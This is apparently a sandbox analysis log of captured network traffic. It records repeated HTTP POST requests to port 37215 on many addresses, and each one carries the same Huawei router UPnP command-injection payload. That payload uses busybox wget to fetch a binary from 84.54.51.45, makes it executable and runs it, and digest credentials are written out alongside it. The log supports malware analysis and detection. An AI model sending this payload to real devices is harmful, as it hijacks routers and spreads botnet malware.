2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2061192.168.2.154538841.42.65.9337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667490005 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2062192.168.2.155468841.177.120.21237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667526960 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2063192.168.2.153579641.66.82.13137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667527914 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2064192.168.2.156071041.232.65.23937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667593956 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2065192.168.2.156027641.52.162.5737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667619944 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2066192.168.2.155797841.138.158.21637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667619944 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2067192.168.2.154012641.38.216.19337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667665005 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2068192.168.2.155968841.94.74.15337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667665005 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2069192.168.2.155875241.161.231.11937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667670012 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2070192.168.2.153320441.224.58.12937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667696953 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2071192.168.2.153359041.109.106.6637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667813063 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
